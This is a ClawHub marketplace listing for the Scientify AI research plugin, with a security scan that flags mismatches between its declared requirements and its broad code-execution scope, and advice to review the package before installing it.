ClawHub
Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

Scientify - AI-powered collaborator for your scientific research works. V2

v2.0.0

Use this when the user wants to install or set up the Scientify research plugin. Adds research-pipeline, literature-survey, idea-generation, arxiv tools, and...

0· 90·0 current·0 all-time
by@stavc
MIT-0
Download zip
LicenseMIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
VirusTotalVirusTotal
Benign
View report →
OpenClawOpenClaw
Suspicious
medium confidence
Purpose & Capability
The name/description (scientific research assistant) aligns with the declared npm package and the listed tools (arXiv, OpenAlex, Unpaywall, GitHub). However the SKILL.md describes running Python virtualenv isolation ('uv'), running experiments and spawning sub-agents while the skill metadata lists no required binaries (python, pip, venv, GPU drivers) or environment variables. That omission is an internal inconsistency.
!
Instruction Scope
SKILL.md instructs the agent to search external services, batch-download paper sources (.tex/.pdf), fetch GitHub repos, spawn sub-agents, execute code (implement models, run 2-epoch validations, full experiments). Those are network- and execution-heavy actions that give the plugin broad runtime discretion, but the instructions do not enumerate required runtimes, limits, or safety constraints. Because the skill would execute downloaded code/data and conduct experiments, this scope grants significant capabilities that are not fully specified.
Install Mechanism
Install is an npm package (scientify) referenced with npm/GitHub links — a common distribution mechanism. npm installs are moderate risk because the package could contain arbitrary install/run scripts; no package contents are included here for review. The SKILL.md also warns to use the platform installer rather than npm directly, but that does not change the underlying source being a public npm package.
Credentials
The skill declares no required environment variables or credentials. That is proportionate to a read-only literature survey. However some described features (heavy GitHub search, Unpaywall rate-limited downloads, large-scale experiments) frequently need API tokens, emails, or compute credentials in practice — their absence is an unexplained omission but not itself overbroad.
Persistence & Privilege
always is false and model invocation is allowed (platform default). The skill does not request elevated or persistent system-wide privileges in its metadata.
What to consider before installing
This skill looks like a plausible research plugin, but there are important mismatches and unknowns to check before installing: 1) Inspect the npm package and the GitHub repo (tsingyuai) to verify what code runs on install and at runtime (look for postinstall scripts, network calls, or code-execution of downloaded artifacts). 2) Confirm what runtimes are required (Python, pip, venv, CUDA/GPU drivers) — SKILL.md describes creating Python venvs and running experiments but the manifest lists no binaries. 3) Consider network and data risks: the plugin will download papers and repositories and may execute code from them — run initially in a sandboxed environment and monitor outbound connections. 4) If you plan heavy GitHub or Unpaywall use, verify whether API credentials or rate-limiting behavior are needed and whether the plugin will store or transmit them. 5) If you need stronger guarantees, ask the publisher for the package source tarball or an audit, or only install after reviewing the package contents and any install/run scripts.

Like a lobster shell, security has layers — review code before you run it.

latestvk970mdx80hhdbvfgj8axj8fnwh83zwqd

License

MIT-0
Free to use, modify, and redistribute. No attribution required.
Termshttps://spdx.org/licenses/MIT-0.html

Runtime requirements

🔬 Clawdis

Install

Install Scientify plugin (npm)npm i -g scientify

Comments